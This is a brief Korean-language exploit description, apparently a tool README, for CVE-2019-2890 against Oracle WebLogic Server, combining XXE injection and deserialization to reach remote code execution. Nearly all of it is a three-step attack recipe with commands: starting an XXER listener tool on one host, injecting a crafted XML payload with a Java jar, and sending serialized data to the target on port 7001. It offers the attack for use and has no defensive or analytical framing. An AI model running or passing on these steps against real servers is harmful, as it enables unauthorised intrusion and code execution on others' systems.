
XXE 주입 및 역직렬화를 통해 Oracle WebLogic Server를 대상으로 하는 CVE-2019-2890 익스플로잇으로, 조작된 페이로드를 통해 원격 코드 실행을 가능하게 합니다.
1)XXER 도구 실행 python xxer.py -H 192.168.17.223
2)xxer의 poc를 xx.xml 파일에 넣고, 직렬화된 데이터를 교체한 후 xxer의 poc를 주입합니다; java -jar weblogic_xxe.jar xx.xml
3)java-deserialization-exploit 도구의 weblogic.py를 사용하여 weblogic 서버에 데이터 전송 python weblogic.py 192.168.17.222 7001 weblogic